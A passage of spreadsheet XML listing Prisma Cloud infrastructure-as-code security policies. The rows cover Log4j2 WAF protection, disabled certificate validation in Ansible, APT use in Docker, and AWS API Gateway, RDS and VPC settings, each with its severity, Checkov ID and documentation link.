      <c r="L1307" t="inlineStr"/>
      <c r="M1307" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1307" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1307" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1307" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1307" t="inlineStr"/>
      <c r="R1307" t="inlineStr"/>
      <c r="S1307" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="T1307" t="b">
        <v>0</v>
      </c>
      <c r="U1307" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1307" t="inlineStr">
        <is>
          <t>IaC:Networking:AWS::WAFv2::WebACL,aws-wafv2-web-acl</t>
        </is>
      </c>
      <c r="W1307" t="inlineStr">
        <is>
          <t>Ensure WAF prevents message lookup in Log4j2</t>
        </is>
      </c>
      <c r="X1307" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-waf-prevents-message-lookup-in-log4j2</t>
        </is>
      </c>
      <c r="Y1307" t="inlineStr"/>
      <c r="Z1307" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["AWS::WAFv2::WebACL","aws_wafv2_web_acl"]}</t>
        </is>
      </c>
      <c r="AA1307" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1307" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1307" t="inlineStr">
        <is>
          <t>CKV_AWS_192</t>
        </is>
      </c>
      <c r="AD1307" t="b">
        <v>1</v>
      </c>
      <c r="AE1307" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1307" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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7" t="inlineStr">
        <is>
          <t>da1c5426-e898-4eac-99d5-a5a45b6e4e6d</t>
        </is>
      </c>
      <c r="AI1307" t="inlineStr"/>
      <c r="AJ1307" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1307" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1308">
      <c r="A1308" t="inlineStr"/>
      <c r="B1308" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1308" s="2" t="inlineStr"/>
      <c r="D1308" t="inlineStr"/>
      <c r="E1308" t="inlineStr"/>
      <c r="F1308" t="inlineStr"/>
      <c r="G1308" t="b">
        <v>1</v>
      </c>
      <c r="H13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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1308" t="inlineStr">
        <is>
          <t>IaC:Networking:RUN</t>
        </is>
      </c>
      <c r="K1308" t="inlineStr">
        <is>
          <t>Docker APT is used</t>
        </is>
      </c>
      <c r="L1308" t="inlineStr"/>
      <c r="M1308" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1308" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1308" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1308" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1308" t="inlineStr"/>
      <c r="R1308" t="inlineStr"/>
      <c r="S1308" t="inlineStr"/>
      <c r="T1308" t="b">
        <v>0</v>
      </c>
      <c r="U1308" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1308" t="inlineStr">
        <is>
          <t>IaC:Networking:RUN</t>
        </is>
      </c>
      <c r="W1308" t="inlineStr">
        <is>
          <t>Ensure that APT isn't used</t>
        </is>
      </c>
      <c r="X1308" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-apt-is-not-used</t>
        </is>
      </c>
      <c r="Y1308" t="inlineStr"/>
      <c r="Z1308" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["RUN"]}</t>
        </is>
      </c>
      <c r="AA1308" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1308" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1308" t="inlineStr">
        <is>
          <t>CKV_DOCKER_9</t>
        </is>
      </c>
      <c r="AD1308" t="b">
        <v>1</v>
      </c>
      <c r="AE1308" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1308" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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8" t="inlineStr">
        <is>
          <t>e2c80d46-7f1f-4ef8-af47-0a60a23a8624</t>
        </is>
      </c>
      <c r="AI1308" t="inlineStr"/>
      <c r="AJ1308" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1308" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1309">
      <c r="A1309" t="inlineStr"/>
      <c r="B1309" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1309" s="2" t="inlineStr"/>
      <c r="D1309" t="inlineStr"/>
      <c r="E1309" t="inlineStr"/>
      <c r="F1309" t="inlineStr"/>
      <c r="G1309" t="b">
        <v>1</v>
      </c>
      <c r="H13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09" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1309" t="inlineStr">
        <is>
          <t>IaC:Networking:ansible.builtin.get-url,get</t>
        </is>
      </c>
      <c r="K1309" t="inlineStr">
        <is>
          <t>Certificate validation disabled with Ansible get_url module</t>
        </is>
      </c>
      <c r="L1309" t="inlineStr"/>
      <c r="M1309" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1309" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1309" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1309" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1309" t="inlineStr"/>
      <c r="R1309" t="inlineStr"/>
      <c r="S1309" t="inlineStr"/>
      <c r="T1309" t="b">
        <v>0</v>
      </c>
      <c r="U1309" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1309" t="inlineStr">
        <is>
          <t>IaC:Networking:ansible.builtin.get-url,get-url</t>
        </is>
      </c>
      <c r="W1309" t="inlineStr">
        <is>
          <t>Ensure that certificate validation isn't disabled with get_url</t>
        </is>
      </c>
      <c r="X1309" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ansible-policies/ansible-networking-policies/ansible-2</t>
        </is>
      </c>
      <c r="Y1309" t="inlineStr"/>
      <c r="Z1309" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["ansible.builtin.get_url","get_url"]}</t>
        </is>
      </c>
      <c r="AA1309" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1309" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1309" t="inlineStr">
        <is>
          <t>CKV_ANSIBLE_2</t>
        </is>
      </c>
      <c r="AD1309" t="b">
        <v>1</v>
      </c>
      <c r="AE1309" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1309" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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09" t="inlineStr">
        <is>
          <t>d68f587a-d513-4364-bbff-b83493445794</t>
        </is>
      </c>
      <c r="AI1309" t="inlineStr"/>
      <c r="AJ1309" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1309" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1310">
      <c r="A1310" t="inlineStr"/>
      <c r="B1310" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1310" s="2" t="inlineStr"/>
      <c r="D1310" t="inlineStr"/>
      <c r="E1310" t="inlineStr"/>
      <c r="F1310" t="inlineStr"/>
      <c r="G1310" t="b">
        <v>1</v>
      </c>
      <c r="H13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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1310" t="inlineStr">
        <is>
          <t>IaC:Networking:ansible.builtin.uri,uri</t>
        </is>
      </c>
      <c r="K1310" t="inlineStr">
        <is>
          <t>Disabled Ansible URI certificate validation</t>
        </is>
      </c>
      <c r="L1310" t="inlineStr"/>
      <c r="M1310" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1310" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1310" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1310" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1310" t="inlineStr"/>
      <c r="R1310" t="inlineStr"/>
      <c r="S1310" t="inlineStr"/>
      <c r="T1310" t="b">
        <v>0</v>
      </c>
      <c r="U1310" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1310" t="inlineStr">
        <is>
          <t>IaC:Networking:ansible.builtin.uri,uri</t>
        </is>
      </c>
      <c r="W1310" t="inlineStr">
        <is>
          <t>Ensure that certificate validation isn't disabled with uri</t>
        </is>
      </c>
      <c r="X1310" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ansible-policies/ansible-networking-policies/ansible-1</t>
        </is>
      </c>
      <c r="Y1310" t="inlineStr"/>
      <c r="Z1310" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["ansible.builtin.uri","uri"]}</t>
        </is>
      </c>
      <c r="AA1310" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1310" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1310" t="inlineStr">
        <is>
          <t>CKV_ANSIBLE_1</t>
        </is>
      </c>
      <c r="AD1310" t="b">
        <v>1</v>
      </c>
      <c r="AE1310" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1310" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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0" t="inlineStr">
        <is>
          <t>d39189a9-2262-4be9-827c-c471123174af</t>
        </is>
      </c>
      <c r="AI1310" t="inlineStr"/>
      <c r="AJ1310" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1310" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1311">
      <c r="A1311" t="inlineStr"/>
      <c r="B1311" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1311" s="2" t="inlineStr"/>
      <c r="D1311" t="inlineStr"/>
      <c r="E1311" t="inlineStr"/>
      <c r="F1311" t="inlineStr"/>
      <c r="G1311" t="b">
        <v>1</v>
      </c>
      <c r="H13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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1311" t="inlineStr">
        <is>
          <t>IaC:Networking:ansible.builtin.yum,yum</t>
        </is>
      </c>
      <c r="K1311" t="inlineStr">
        <is>
          <t>SSL validation is disabled with yum</t>
        </is>
      </c>
      <c r="L1311" t="inlineStr"/>
      <c r="M1311" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1311" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1311" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1311" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1311" t="inlineStr"/>
      <c r="R1311" t="inlineStr"/>
      <c r="S1311" t="inlineStr"/>
      <c r="T1311" t="b">
        <v>0</v>
      </c>
      <c r="U1311" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1311" t="inlineStr">
        <is>
          <t>IaC:Networking:ansible.builtin.yum,yum</t>
        </is>
      </c>
      <c r="W1311" t="inlineStr">
        <is>
          <t>Ensure that SSL validation isn't disabled with yum</t>
        </is>
      </c>
      <c r="X1311" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ansible-policies/ansible-networking-policies/ansible-4</t>
        </is>
      </c>
      <c r="Y1311" t="inlineStr"/>
      <c r="Z1311" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["ansible.builtin.yum","yum"]}</t>
        </is>
      </c>
      <c r="AA1311" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1311" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1311" t="inlineStr">
        <is>
          <t>CKV_ANSIBLE_4</t>
        </is>
      </c>
      <c r="AD1311" t="b">
        <v>1</v>
      </c>
      <c r="AE1311" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1311" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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1" t="inlineStr">
        <is>
          <t>4e77bcf8-2c01-4a3d-ab47-aff506bd034e</t>
        </is>
      </c>
      <c r="AI1311" t="inlineStr"/>
      <c r="AJ1311" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1311" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1312">
      <c r="A1312" t="inlineStr"/>
      <c r="B1312" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1312" s="2" t="inlineStr"/>
      <c r="D1312" t="inlineStr"/>
      <c r="E1312" t="inlineStr"/>
      <c r="F1312" t="inlineStr"/>
      <c r="G1312" t="b">
        <v>1</v>
      </c>
      <c r="H13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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1312" t="inlineStr">
        <is>
          <t>IaC:Networking:ansible.builtin.yum,yum</t>
        </is>
      </c>
      <c r="K1312" t="inlineStr">
        <is>
          <t>SSL certificate validation disabled with Ansible Yum</t>
        </is>
      </c>
      <c r="L1312" t="inlineStr"/>
      <c r="M1312" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1312" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1312" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1312" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1312" t="inlineStr"/>
      <c r="R1312" t="inlineStr"/>
      <c r="S1312" t="inlineStr"/>
      <c r="T1312" t="b">
        <v>0</v>
      </c>
      <c r="U1312" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1312" t="inlineStr">
        <is>
          <t>IaC:Networking:ansible.builtin.yum,yum</t>
        </is>
      </c>
      <c r="W1312" t="inlineStr">
        <is>
          <t>Ensure that certificate validation isn't disabled with yum</t>
        </is>
      </c>
      <c r="X1312" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ansible-policies/ansible-networking-policies/ansible-3</t>
        </is>
      </c>
      <c r="Y1312" t="inlineStr"/>
      <c r="Z1312" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["ansible.builtin.yum","yum"]}</t>
        </is>
      </c>
      <c r="AA1312" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1312" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1312" t="inlineStr">
        <is>
          <t>CKV_ANSIBLE_3</t>
        </is>
      </c>
      <c r="AD1312" t="b">
        <v>1</v>
      </c>
      <c r="AE1312" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1312" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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2" t="inlineStr">
        <is>
          <t>cec8654a-8b01-4530-b589-fa7b739cb07e</t>
        </is>
      </c>
      <c r="AI1312" t="inlineStr"/>
      <c r="AJ1312" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1312" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1313">
      <c r="A1313" t="inlineStr"/>
      <c r="B1313" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1313" s="2" t="inlineStr"/>
      <c r="D1313" t="inlineStr"/>
      <c r="E1313" t="inlineStr"/>
      <c r="F1313" t="inlineStr"/>
      <c r="G1313" t="b">
        <v>1</v>
      </c>
      <c r="H13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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1313" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-acm</t>
        </is>
      </c>
      <c r="K1313" t="inlineStr">
        <is>
          <t>AWS ACM certificate does not enable Create before Destroy</t>
        </is>
      </c>
      <c r="L1313" t="inlineStr"/>
      <c r="M1313" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1313" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1313" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1313" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1313" t="inlineStr"/>
      <c r="R1313" t="inlineStr"/>
      <c r="S1313" t="inlineStr"/>
      <c r="T1313" t="b">
        <v>0</v>
      </c>
      <c r="U1313" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1313" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-acm-certificate</t>
        </is>
      </c>
      <c r="W1313" t="inlineStr">
        <is>
          <t>Ensure Create before destroy for ACM certificates</t>
        </is>
      </c>
      <c r="X1313" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-aws-acm-certificate-enables-create-before-destroy</t>
        </is>
      </c>
      <c r="Y1313" t="inlineStr"/>
      <c r="Z1313" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_acm_certificate"]}</t>
        </is>
      </c>
      <c r="AA1313" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1313" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1313" t="inlineStr">
        <is>
          <t>CKV_AWS_233</t>
        </is>
      </c>
      <c r="AD1313" t="b">
        <v>1</v>
      </c>
      <c r="AE1313" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1313" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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3" t="inlineStr">
        <is>
          <t>bbab99c0-d187-428c-b2f4-a86b7a851b5a</t>
        </is>
      </c>
      <c r="AI1313" t="inlineStr"/>
      <c r="AJ1313" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1313" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1314">
      <c r="A1314" t="inlineStr"/>
      <c r="B1314" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1314" s="2" t="inlineStr"/>
      <c r="D1314" t="inlineStr"/>
      <c r="E1314" t="inlineStr"/>
      <c r="F1314" t="inlineStr"/>
      <c r="G1314" t="b">
        <v>1</v>
      </c>
      <c r="H13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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1314" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-api</t>
        </is>
      </c>
      <c r="K1314" t="inlineStr">
        <is>
          <t>AWS API Gateway method lacking authorization or API keys</t>
        </is>
      </c>
      <c r="L1314" t="inlineStr"/>
      <c r="M1314" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1314" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1314" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1314" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1314" t="inlineStr"/>
      <c r="R1314" t="inlineStr"/>
      <c r="S1314" t="inlineStr"/>
      <c r="T1314" t="b">
        <v>0</v>
      </c>
      <c r="U1314" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1314" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-api-gateway-method</t>
        </is>
      </c>
      <c r="W1314" t="inlineStr">
        <is>
          <t>This policy detects whether an API Gateway method is missing authorization or an API key. It is crucial to implement these security measures to ensure that only authenticated and authorized users can access the API.</t>
        </is>
      </c>
      <c r="X1314" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/bc-aws-2-70</t>
        </is>
      </c>
      <c r="Y1314" t="inlineStr"/>
      <c r="Z1314" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_api_gateway_method"]}</t>
        </is>
      </c>
      <c r="AA1314" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1314" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1314" t="inlineStr">
        <is>
          <t>CKV2_AWS_70</t>
        </is>
      </c>
      <c r="AD1314" t="b">
        <v>1</v>
      </c>
      <c r="AE1314" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1314" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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4" t="inlineStr">
        <is>
          <t>508ce0ec-a6ba-4e34-a721-e9633b10296a</t>
        </is>
      </c>
      <c r="AI1314" t="inlineStr"/>
      <c r="AJ1314" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1314" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1315">
      <c r="A1315" t="inlineStr"/>
      <c r="B1315" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1315" s="2" t="inlineStr"/>
      <c r="D1315" t="inlineStr"/>
      <c r="E1315" t="inlineStr"/>
      <c r="F1315" t="inlineStr"/>
      <c r="G1315" t="b">
        <v>1</v>
      </c>
      <c r="H13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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1315" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-api</t>
        </is>
      </c>
      <c r="K1315" t="inlineStr">
        <is>
          <t>Public API gateway not configured with AWS Web Application Firewall v2 (AWS WAFv2)</t>
        </is>
      </c>
      <c r="L1315" t="inlineStr"/>
      <c r="M1315" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1315" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1315" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1315" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1315" t="inlineStr"/>
      <c r="R1315" t="inlineStr"/>
      <c r="S1315" t="inlineStr"/>
      <c r="T1315" t="b">
        <v>0</v>
      </c>
      <c r="U1315" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1315" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-api-gateway-rest-api,aws-api-gateway-stage,aws-wafregional-web-acl-association</t>
        </is>
      </c>
      <c r="W1315" t="inlineStr">
        <is>
          <t>Ensure public API gateway are protected by WAF</t>
        </is>
      </c>
      <c r="X1315" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-public-api-gateway-are-protected-by-waf</t>
        </is>
      </c>
      <c r="Y1315" t="inlineStr"/>
      <c r="Z1315" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_api_gateway_rest_api","aws_api_gateway_stage","aws_wafregional_web_acl_association"]}</t>
        </is>
      </c>
      <c r="AA1315" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1315" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1315" t="inlineStr">
        <is>
          <t>CKV2_AWS_29</t>
        </is>
      </c>
      <c r="AD1315" t="b">
        <v>1</v>
      </c>
      <c r="AE1315" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1315" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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5" t="inlineStr">
        <is>
          <t>fa2c54f0-629e-4913-8adf-c81092250789</t>
        </is>
      </c>
      <c r="AI1315" t="inlineStr"/>
      <c r="AJ1315" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1315" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1316">
      <c r="A1316" t="inlineStr"/>
      <c r="B1316" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1316" s="2" t="inlineStr"/>
      <c r="D1316" t="inlineStr"/>
      <c r="E1316" t="inlineStr"/>
      <c r="F1316" t="inlineStr"/>
      <c r="G1316" t="b">
        <v>1</v>
      </c>
      <c r="H13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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1316" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-db</t>
        </is>
      </c>
      <c r="K1316" t="inlineStr">
        <is>
          <t>AWS RDS security groups are not defined</t>
        </is>
      </c>
      <c r="L1316" t="inlineStr"/>
      <c r="M1316" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1316" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1316" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1316" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1316" t="inlineStr"/>
      <c r="R1316" t="inlineStr"/>
      <c r="S1316" t="inlineStr"/>
      <c r="T1316" t="b">
        <v>0</v>
      </c>
      <c r="U1316" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1316" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-db-security-group</t>
        </is>
      </c>
      <c r="W1316" t="inlineStr">
        <is>
          <t>Ensure no aws_db_security_group resources exist</t>
        </is>
      </c>
      <c r="X1316" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-aws-rds-security-groups-are-defined</t>
        </is>
      </c>
      <c r="Y1316" t="inlineStr"/>
      <c r="Z1316" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_db_security_group"]}</t>
        </is>
      </c>
      <c r="AA1316" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1316" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1316" t="inlineStr">
        <is>
          <t>CKV_AWS_198</t>
        </is>
      </c>
      <c r="AD1316" t="b">
        <v>1</v>
      </c>
      <c r="AE1316" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1316" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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6" t="inlineStr">
        <is>
          <t>39e0a984-0fea-485f-96f3-b43d23f7c9c9</t>
        </is>
      </c>
      <c r="AI1316" t="inlineStr"/>
      <c r="AJ1316" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1316" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1317">
      <c r="A1317" t="inlineStr"/>
      <c r="B1317" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1317" s="2" t="inlineStr"/>
      <c r="D1317" t="inlineStr"/>
      <c r="E1317" t="inlineStr"/>
      <c r="F1317" t="inlineStr"/>
      <c r="G1317" t="b">
        <v>1</v>
      </c>
      <c r="H13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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1317" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-default</t>
        </is>
      </c>
      <c r="K1317" t="inlineStr">
        <is>
          <t>Default VPC is planned to be provisioned</t>
        </is>
      </c>
      <c r="L1317" t="inlineStr"/>
      <c r="M1317" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1317" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
